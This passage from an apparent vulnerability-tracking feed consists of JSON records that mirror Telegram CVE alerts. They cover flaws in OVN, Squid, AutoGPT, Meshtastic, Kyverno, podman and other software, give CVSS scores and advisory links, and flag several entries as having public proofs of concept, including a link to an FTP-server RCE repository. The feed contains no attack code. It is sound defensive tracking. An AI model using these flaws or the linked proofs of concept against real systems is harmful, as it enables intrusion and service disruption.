CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.\n\ud83d\udccf Published: 2024-03-12T16:18:31.829Z\n\ud83d\udccf Modified: 2025-04-15T15:26:18.815Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1385\n2. https://access.redhat.com/errata/RHSA-2024:1386\n3. https://access.redhat.com/errata/RHSA-2024:1387\n4. https://access.redhat.com/errata/RHSA-2024:1388\n5. https://access.redhat.com/errata/RHSA-2024:1390\n6. https://access.redhat.com/errata/RHSA-2024:1391\n7. https://access.redhat.com/errata/RHSA-2024:1392\n8. https://access.redhat.com/errata/RHSA-2024:1393\n9. https://access.redhat.com/errata/RHSA-2024:1394\n10. https://access.redhat.com/errata/RHSA-2024:4035\n11. https://access.redhat.com/security/cve/CVE-2024-2182\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2267840\n13. https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html\n14. https://www.openwall.com/lists/oss-security/2024/03/12/5", "creation_timestamp": "2025-04-15T15:54:53.000000Z"}, {"uuid": "b2f16ee2-8b2c-471d-b484-59a4f68cca82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WH6M-H6F4-RJF4", "type": "published-proof-of-concept", "source": "Telegram/iY4yZ2PFpGxByFsrgplKVch9nhT5x9DeCvqvBNZo45zgPeM", "content": "", "creation_timestamp": "2026-01-02T15:08:07.000000Z"}, {"uuid": "30e13857-4624-4e07-80a4-2034c5b67229", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1393", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11857", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2182\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.\n\ud83d\udccf Published: 2024-03-12T16:18:31.829Z\n\ud83d\udccf Modified: 2025-04-15T15:26:18.815Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1385\n2. https://access.redhat.com/errata/RHSA-2024:1386\n3. https://access.redhat.com/errata/RHSA-2024:1387\n4. https://access.redhat.com/errata/RHSA-2024:1388\n5. https://access.redhat.com/errata/RHSA-2024:1390\n6. https://access.redhat.com/errata/RHSA-2024:1391\n7. https://access.redhat.com/errata/RHSA-2024:1392\n8. https://access.redhat.com/errata/RHSA-2024:1393\n9. https://access.redhat.com/errata/RHSA-2024:1394\n10. https://access.redhat.com/errata/RHSA-2024:4035\n11. https://access.redhat.com/security/cve/CVE-2024-2182\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2267840\n13. https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html\n14. https://www.openwall.com/lists/oss-security/2024/03/12/5", "creation_timestamp": "2025-04-15T15:54:53.000000Z"}, {"uuid": "4a04e064-711b-433e-b3cc-630f2389e16c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1386", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11857", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2182\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.\n\ud83d\udccf Published: 2024-03-12T16:18:31.829Z\n\ud83d\udccf Modified: 2025-04-15T15:26:18.815Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1385\n2. https://access.redhat.com/errata/RHSA-2024:1386\n3. https://access.redhat.com/errata/RHSA-2024:1387\n4. https://access.redhat.com/errata/RHSA-2024:1388\n5. https://access.redhat.com/errata/RHSA-2024:1390\n6. https://access.redhat.com/errata/RHSA-2024:1391\n7. https://access.redhat.com/errata/RHSA-2024:1392\n8. https://access.redhat.com/errata/RHSA-2024:1393\n9. https://access.redhat.com/errata/RHSA-2024:1394\n10. https://access.redhat.com/errata/RHSA-2024:4035\n11. https://access.redhat.com/security/cve/CVE-2024-2182\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2267840\n13. https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html\n14. https://www.openwall.com/lists/oss-security/2024/03/12/5", "creation_timestamp": "2025-04-15T15:54:53.000000Z"}, {"uuid": "e475e46a-9af2-4ce8-9808-1ae00582838f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1392", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11857", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2182\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.\n\ud83d\udccf Published: 2024-03-12T16:18:31.829Z\n\ud83d\udccf Modified: 2025-04-15T15:26:18.815Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1385\n2. https://access.redhat.com/errata/RHSA-2024:1386\n3. https://access.redhat.com/errata/RHSA-2024:1387\n4. https://access.redhat.com/errata/RHSA-2024:1388\n5. https://access.redhat.com/errata/RHSA-2024:1390\n6. https://access.redhat.com/errata/RHSA-2024:1391\n7. https://access.redhat.com/errata/RHSA-2024:1392\n8. https://access.redhat.com/errata/RHSA-2024:1393\n9. https://access.redhat.com/errata/RHSA-2024:1394\n10. https://access.redhat.com/errata/RHSA-2024:4035\n11. https://access.redhat.com/security/cve/CVE-2024-2182\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2267840\n13. https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html\n14. https://www.openwall.com/lists/oss-security/2024/03/12/5", "creation_timestamp": "2025-04-15T15:54:53.000000Z"}, {"uuid": "20f649b5-bec5-4007-8252-1695f7432216", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F9X3-MJ2R-CQMF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11648", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-46179\n\ud83d\udd25 CVSS Score: 9.2 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H)\n\ud83d\udd39 Description: LiuOS is a small Python project meant to imitate the functions of a regular operating system. Version 0.1.0 and prior of LiuOS allow an attacker to set the GITHUB_ACTIONS environment variable to anything other than null or true and skip authentication checks. This issue is patched in the latest commit (c658b4f3e57258acf5f6207a90c2f2169698ae22) by requiring the var to be set to true, causing a test script to run instead of being able to login. A potential workaround is to check for the GITHUB_ACTIONS environment variable and set it to \"\" (no quotes) to null the variable and force credential checks.\n\ud83d\udccf Published: 2022-12-28T07:00:37.036Z\n\ud83d\udccf Modified: 2025-04-14T16:20:27.821Z\n\ud83d\udd17 References:\n1. https://github.com/LiuWoodsCode/LiuOS/security/advisories/GHSA-f9x3-mj2r-cqmf\n2. https://github.com/LiuWoodsCode/LiuOS/commit/c658b4f3e57258acf5f6207a90c2f2169698ae22", "creation_timestamp": "2025-04-14T16:53:44.000000Z"}, {"uuid": "3fb4e52a-ceb5-4e63-9ebf-a02b706587fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V364-RW7M-3263", "type": "published-proof-of-concept", "source": "Telegram/TtjXsNK2JI7-6q-2dTs3Ev3VxXtuEcF5K_zir_JYhY6EW9Y", "content": "", "creation_timestamp": "2026-01-08T02:00:39.000000Z"}, {"uuid": "b09637ff-04dc-4d11-8bd0-82f8e60d684d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C7HR-448W-65PX", "type": "seen", "source": "https://t.me/poxek/6193", "content": "", "creation_timestamp": "2026-07-13T13:00:04.226106Z"}, {"uuid": "44af1d15-8431-4d04-b9ad-88cacf613289", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-394C-RR7Q-6G78", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11685", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-41318\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: A buffer over-read was discovered in libntlmauth in Squid 2.5 through 5.6. Due to incorrect integer-overflow protection, the SSPI and SMB authentication helpers are vulnerable to reading unintended memory locations. In some configurations, cleartext credentials from these locations are sent to a client. This is fixed in 5.7.\n\ud83d\udccf Published: 2022-12-25T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-14T18:33:53.348Z\n\ud83d\udd17 References:\n1. https://github.com/squid-cache/squid/security/advisories/GHSA-394c-rr7q-6g78\n2. http://www.squid-cache.org/Versions/v4/changesets/SQUID-2022_2.patch\n3. http://www.squid-cache.org/Versions/v5/changesets/SQUID-2022_2.patch\n4. https://www.openwall.com/lists/oss-security/2022/09/23/2", "creation_timestamp": "2025-04-14T18:54:16.000000Z"}, {"uuid": "eab6189e-57af-4652-8ddc-6ea7736dd8b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GGCM-93QG-GFHP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11734", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31491\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: AutoGPT is a platform that allows users to create, deploy, and manage continuous artificial intelligence agents that automate complex workflows. Prior to 0.6.1, AutoGPT allows of leakage of cross-domain cookies and protected headers in requests redirect. AutoGPT uses a wrapper around the requests python library, located in autogpt_platform/backend/backend/util/request.py. In this wrapper, redirects are specifically NOT followed for the first request. If the wrapper is used with allow_redirects set to True (which is the default), any redirect is not followed by the initial request, but rather re-requested by the wrapper using the new location. However, there is a fundamental flaw in manually re-requesting the new location: it does not account for security-sensitive headers which should not be sent cross-origin, such as the Authorization and Proxy-Authorization header, and cookies. For example in autogpt_platform/backend/backend/blocks/github/_api.py, an Authorization header is set when retrieving data from the GitHub API. However, if GitHub suffers from an open redirect vulnerability (such as the made-up example of https://api.github.com/repos/{owner}/{repo}/issues/comments/{comment_id}/../../../../../redirect/?url=https://joshua.hu/), and the script can be coerced into visiting it with the Authorization header, the GitHub credentials in the Authorization header will be leaked. This allows leaking auth headers and private cookies. This vulnerability is fixed in 0.6.1.\n\ud83d\udccf Published: 2025-04-14T23:15:56.611Z\n\ud83d\udccf Modified: 2025-04-14T23:15:56.611Z\n\ud83d\udd17 References:\n1. https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-ggcm-93qg-gfhp", "creation_timestamp": "2025-04-14T23:53:49.000000Z"}, {"uuid": "59b683ee-35a1-45a9-aeed-efad8043b0e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V4PR-FM98-W9PG", "type": "published-proof-of-concept", "source": "Telegram/2ek7eyEQkPBVm_oE9OK31_C8c0inA6djA7KhdWeXyx-F_04", "content": "", "creation_timestamp": "2026-01-08T01:03:43.000000Z"}, {"uuid": "d4f63a3b-951e-4558-8456-c657d9262511", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CRPV-FMC4-J392", "type": "published-proof-of-concept", "source": "Telegram/2ek7eyEQkPBVm_oE9OK31_C8c0inA6djA7KhdWeXyx-F_04", "content": "", "creation_timestamp": "2026-01-08T01:03:43.000000Z"}, {"uuid": "30302605-7613-4178-8965-f15e477b1212", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33HW-XHFH-944R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11732", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24797\n\ud83d\udd25 CVSS Score: 9.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H)\n\ud83d\udd39 Description: Meshtastic is an open source mesh networking solution. A fault in the handling of mesh packets containing invalid protobuf data can result in an attacker-controlled buffer overflow, allowing an attacker to hijack execution flow, potentially resulting in remote code execution. This attack does not require authentication or user interaction, as long as the target device rebroadcasts packets on the default channel. This vulnerability fixed in 2.6.2.\n\ud83d\udccf Published: 2025-04-14T23:25:19.152Z\n\ud83d\udccf Modified: 2025-04-14T23:25:19.152Z\n\ud83d\udd17 References:\n1. https://github.com/meshtastic/firmware/security/advisories/GHSA-33hw-xhfh-944r", "creation_timestamp": "2025-04-14T23:53:47.000000Z"}, {"uuid": "94aae78f-cee1-409b-b5b1-1e2c617cb7be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M3CQ-XCX9-3GVM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11748", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-47633\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An image signature validation bypass vulnerability in Kyverno 1.8.3 and 1.8.4 allows a malicious image registry (or a man-in-the-middle attacker) to inject unsigned arbitrary container images into a protected Kubernetes cluster. This is fixed in 1.8.5. This has been fixed in 1.8.5 and mitigations are available for impacted releases.\n\ud83d\udccf Published: 2022-12-23T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-15T03:22:55.828Z\n\ud83d\udd17 References:\n1. https://kyverno.io/docs/writing-policies/verify-images/\n2. https://github.com/kyverno/kyverno/compare/v1.8.4...v1.8.5\n3. https://github.com/kyverno/kyverno/releases/tag/v1.8.5\n4. https://github.com/kyverno/kyverno/pull/5713\n5. https://github.com/kyverno/kyverno/security/advisories/GHSA-m3cq-xcx9-3gvm", "creation_timestamp": "2025-04-15T03:54:26.000000Z"}, {"uuid": "e87c9d0c-b2d0-43b8-9552-8504e4919338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8947-PFFF-2F3C", "type": "published-proof-of-concept", "source": "Telegram/2ek7eyEQkPBVm_oE9OK31_C8c0inA6djA7KhdWeXyx-F_04", "content": "", "creation_timestamp": "2026-01-08T01:03:43.000000Z"}, {"uuid": "458ace5f-aac2-4cf9-be0e-31c1dec92dde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MR2R-WJF8-CJ3C", "type": "published-proof-of-concept", "source": "Telegram/2ek7eyEQkPBVm_oE9OK31_C8c0inA6djA7KhdWeXyx-F_04", "content": "", "creation_timestamp": "2026-01-08T01:03:43.000000Z"}, {"uuid": "00f227ae-bae1-4e4e-bef1-1be93aa9b451", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VRQ4-9HC3-CGP7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11731", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32428\n\ud83d\udd25 CVSS Score: 9 (cvssV4_0, Vector: CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: Jupyter Remote Desktop Proxy allows you to run a Linux Desktop on a JupyterHub. jupyter-remote-desktop-proxy was meant to rely on UNIX sockets readable only by the current user since version 3.0.0, but when used with TigerVNC, the VNC server started by jupyter-remote-desktop-proxy were still accessible via the network. This vulnerability does not affect users having TurboVNC as the vncserver executable. This issue is fixed in 3.0.1.\n\ud83d\udccf Published: 2025-04-14T23:29:40.494Z\n\ud83d\udccf Modified: 2025-04-14T23:29:40.494Z\n\ud83d\udd17 References:\n1. https://github.com/jupyterhub/jupyter-remote-desktop-proxy/security/advisories/GHSA-vrq4-9hc3-cgp7\n2. https://github.com/jupyterhub/jupyter-remote-desktop-proxy/commit/7dd54c25a4253badd8ea68895437e5a66a59090d", "creation_timestamp": "2025-04-14T23:53:46.000000Z"}, {"uuid": "83e04fd1-3131-4e3a-8f93-d7fa013df50e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-958F-37VW-JX8F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11733", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31494\n\ud83d\udd25 CVSS Score: 3.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: AutoGPT is a platform that allows users to create, deploy, and manage continuous artificial intelligence agents that automate complex workflows. The AutoGPT Platform's WebSocket API transmitted node execution updates to subscribers based on the graph_id+graph_version. Additionally, there was no check prohibiting users from subscribing with another user's graph_id+graph_version. As a result, node execution updates from one user's graph execution could be received by another user within the same instance. This vulnerability does not occur between different instances or between users and non-users of the platform. Single-user instances are not affected. In private instances with a user white-list, the impact is limited by the fact that all potential unintended recipients of these node execution updates must have been admitted by the administrator. This vulnerability is fixed in 0.6.1.\n\ud83d\udccf Published: 2025-04-14T23:21:10.070Z\n\ud83d\udccf Modified: 2025-04-14T23:21:10.070Z\n\ud83d\udd17 References:\n1. https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-958f-37vw-jx8f\n2. https://github.com/Significant-Gravitas/AutoGPT/pull/9660\n3. https://github.com/Significant-Gravitas/AutoGPT/releases/tag/autogpt-platform-beta-v0.6.1", "creation_timestamp": "2025-04-14T23:53:48.000000Z"}, {"uuid": "24b2bc77-fe99-47ea-9542-c7b7081af5f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1908", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "b51f7edd-2b2d-4121-91ea-f6c63194bb6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1372", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "e6b1a4c6-a7ba-4a77-94b1-3f01dfafff18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M67M-3P5G-CW9J", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11903", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32021\n\ud83d\udd25 CVSS Score: 2.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Weblate is a web based localization tool. Prior to version 5.11, when creating a new component from an existing component that has a source code repository URL specified in settings, this URL is included in the client's URL parameters during the creation process. If, for example, the source code repository URL contains GitHub credentials, the confidential PAT and username are shown in plaintext and get saved into browser history. Moreover, if the request URL is logged, the credentials are written to logs in plaintext. If using Weblate official Docker image, nginx logs the URL and the token in plaintext. This issue is patched in version 5.11.\n\ud83d\udccf Published: 2025-04-15T20:39:09.253Z\n\ud83d\udccf Modified: 2025-04-15T20:39:09.253Z\n\ud83d\udd17 References:\n1. https://github.com/WeblateOrg/weblate/security/advisories/GHSA-m67m-3p5g-cw9j\n2. https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.11", "creation_timestamp": "2025-04-15T20:55:03.000000Z"}, {"uuid": "d46d7403-67be-43ac-a509-085cc38e53fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-835J-6976-46JX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11869", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32776\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: OpenRazer is an open source driver and user-space daemon to control Razer device lighting and other features on GNU/Linux. By writing specially crafted data to the `matrix_custom_frame` file, an attacker can cause the custom kernel driver to read more bytes than provided by user space. This data will be written into the RGB arguments which will be sent to the USB device. This issue has been patched in v3.10.2.\n\ud83d\udccf Published: 2025-04-15T16:32:20.628Z\n\ud83d\udccf Modified: 2025-04-15T17:51:38.081Z\n\ud83d\udd17 References:\n1. https://github.com/openrazer/openrazer/security/advisories/GHSA-835j-6976-46jx\n2. https://github.com/openrazer/openrazer/issues/2433\n3. https://github.com/openrazer/openrazer/commit/57610511d2548eda66999eaed5aa4517e89d6d39\n4. https://github.com/openrazer/openrazer/commit/d869abd20995b4931795e1cde54d4ac84d9ca62f", "creation_timestamp": "2025-04-15T17:55:31.000000Z"}, {"uuid": "5650c48a-f1d2-4d9c-a2cc-c10a23d633f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37CP-FGQ5-7WC2", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/38204", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2\nURL\uff1ahttps://github.com/Nouvexr/Wing-FTP-Server-7.4.4-RCE-Authenticated\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-05-26T14:39:13.000000Z"}, {"uuid": "cb715dd8-bc9f-4242-8495-103cb5f9af4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 